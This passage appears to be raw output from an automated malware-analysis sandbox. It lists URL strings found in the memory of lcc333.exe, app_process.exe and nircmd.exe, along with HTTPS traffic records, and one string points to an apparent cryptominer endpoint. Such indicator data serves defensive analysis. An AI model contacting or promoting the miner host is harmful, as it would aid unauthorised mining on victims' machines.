                        Source: lcc333.exe, 00000000.00000003.2106050470.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2107522956.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2104927615.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2107522956.000002172D7EE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105823533.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000002.2526845850.000002172D7EE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105914516.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2111135941.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105068052.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2111291391.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105250934.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2109870127.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2108629944.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
                        Source: lcc333.exe, 00000000.00000003.2106050470.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2107522956.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2104927615.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105823533.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105914516.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2111135941.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105068052.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2111291391.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105250934.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2109870127.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2108629944.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
                        Source: lcc333.exe, 00000002.00000003.2134241371.000002B936A46000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2495042069.000002B936895000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135546245.000002B93688F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
                        Source: lcc333.exe, 00000002.00000003.2134241371.000002B936A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/E%
                        Source: lcc333.exe, 00000002.00000003.2134241371.000002B936A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
                        Source: lcc333.exe, 00000002.00000003.2135431182.000002B936530000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503747221.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2487940110.000002B936530000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2508896833.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2502372429.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2504780607.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2509903410.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2507493476.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2506032098.000002B93652D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
                        Source: lcc333.exe, 00000002.00000003.2135431182.000002B936530000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503747221.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2487940110.000002B936530000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2508896833.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2502372429.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2504780607.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2509903410.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2507493476.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2506032098.000002B93652D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/w
                        Source: lcc333.exe, 00000000.00000003.2106050470.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2104927615.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2107522956.000002172D7EE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105823533.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105914516.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2111135941.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105068052.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2111291391.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105424268.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2105250934.000002172D7DF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2109870127.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2107522956.000002172D7E8000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000000.00000003.2108629944.000002172D7E1000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
                        Source: lcc333.exe, 00000002.00000003.2134241371.000002B936A46000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2495042069.000002B936895000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135546245.000002B93688F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                        Source: lcc333.exe, 00000002.00000003.2116595640.000002B936532000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135431182.000002B936530000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503747221.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2487940110.000002B936530000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2508896833.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2502372429.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2504780607.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2509903410.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2507493476.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2506032098.000002B93652D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2117759859.000002B936540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
                        Source: lcc333.exe, 00000002.00000003.2134241371.000002B936A46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: lcc333.exe, 00000002.00000003.2494404862.000002B93656D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135259032.000002B93656D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2134746911.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135259032.000002B9364F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
                        Source: lcc333.exe, 00000002.00000003.2113514834.000002B935FD1000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2113562718.000002B935FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                        Source: app_process.exe, 00000023.00000000.3345847859.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                        Source: app_process.exe, 00000023.00000000.3345847859.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://ec1ipse.me/miner/rewardspubkey
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                        Source: lcc333.exe, 00000002.00000003.2490746401.000002B937101000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492199056.000002B93790A000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000000.3345847859.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issues
                        Source: lcc333.exe, 00000002.00000003.2490746401.000002B937101000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492199056.000002B93790A000.00000004.00000020.00020000.00000000.sdmp, app_process.exe, 00000012.00000002.3348387189.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000012.00000000.2525092693.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000002.3347236766.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000016.00000000.2527968271.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000002.3357087112.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000020.00000000.3341938213.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000002.3357025814.00007FF791E50000.00000002.00000001.01000000.00000014.sdmp, app_process.exe, 00000023.00000000.3345847859.00007FF791E50000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issuesI
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                        Source: lcc333.exe, 00000002.00000003.2114575582.000002B936420000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2114470386.000002B936424000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2114575582.000002B93643B000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2114530243.000002B93640F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
                        Source: lcc333.exe, 00000002.00000003.2112428462.000002B935FA7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                        Source: lcc333.exe, 00000002.00000003.2134746911.000002B936501000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2506032098.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2507260668.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503747221.000002B936500000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2497811471.000002B936501000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503555040.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2116935879.000002B936501000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2487940110.000002B9364F9000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2504780607.000002B936500000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2510203246.000002B936501000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2508332077.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2494404862.000002B936501000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2506384017.000002B936500000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2117407036.000002B93688E000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2508896833.000002B936500000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2502634893.000002B936500000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2117323517.000002B936502000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2507493476.000002B936500000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2488372313.000002B9364FF000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2504565907.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2502372429.000002B9364FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
                        Source: lcc333.exe, 00000002.00000003.2495042069.000002B936895000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135546245.000002B93688F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
                        Source: lcc333.exe, 00000002.00000003.2495042069.000002B936895000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135546245.000002B93688F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
                        Source: lcc333.exe, 00000002.00000003.2494404862.000002B93656D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2117759859.000002B93656F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2116595640.000002B93656F000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135259032.000002B93656D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
                        Source: lcc333.exe, 00000002.00000003.2506032098.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492097568.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2487940110.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2134746911.000002B936501000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2506032098.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2494404862.000002B93656D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2507260668.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2501237397.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2489080766.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2497982911.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503747221.000002B936500000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2508332077.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2502372429.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2511481302.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2499854920.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2497811471.000002B936501000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135259032.000002B93656D000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2490430465.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503555040.000002B9364FE000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2487940110.000002B9364F9000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2504780607.000002B936500000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
                        Source: lcc333.exe, 00000002.00000003.2135546245.000002B93688F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
                        Source: lcc333.exe, 00000002.00000003.2116935879.000002B9364D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
                        Source: nircmd.exe, nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000000.2526970311.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000000.3340727157.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000002.3344008939.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000000.3344394477.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.nirsoft.net
                        Source: nircmd.exe, 0000000F.00000002.2526477071.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000000F.00000000.2523657662.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000002.2528526092.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000015.00000000.2526970311.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000000.3340727157.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 0000001F.00000002.3344008939.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000000.3344394477.0000000140017000.00000002.00000001.01000000.00000013.sdmp, nircmd.exe, 00000022.00000002.3347749954.0000000140017000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://www.nirsoft.netopenIf
                        Source: lcc333.exe, 00000000.00000003.2108629944.000002172D7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                        Source: lcc333.exe, 00000002.00000003.2506032098.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2492097568.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2487940110.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2501237397.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2489080766.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2497982911.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2508332077.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2502372429.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2511481302.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2499854920.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2490430465.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2116935879.000002B9364D8000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2504565907.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2498834017.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2489759927.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2134746911.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2513385112.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2503555040.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2500583694.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2507260668.000002B9364BC000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2491313804.000002B9364BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
                        Source: lcc333.exe, 00000002.00000003.2507043255.000002B936936000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2134241371.000002B936936000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://wwww.certigna.fr/autorites/0m
                        Source: lcc333.exe, 00000002.00000003.2495042069.000002B936895000.00000004.00000020.00020000.00000000.sdmp, lcc333.exe, 00000002.00000003.2135546245.000002B93688F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
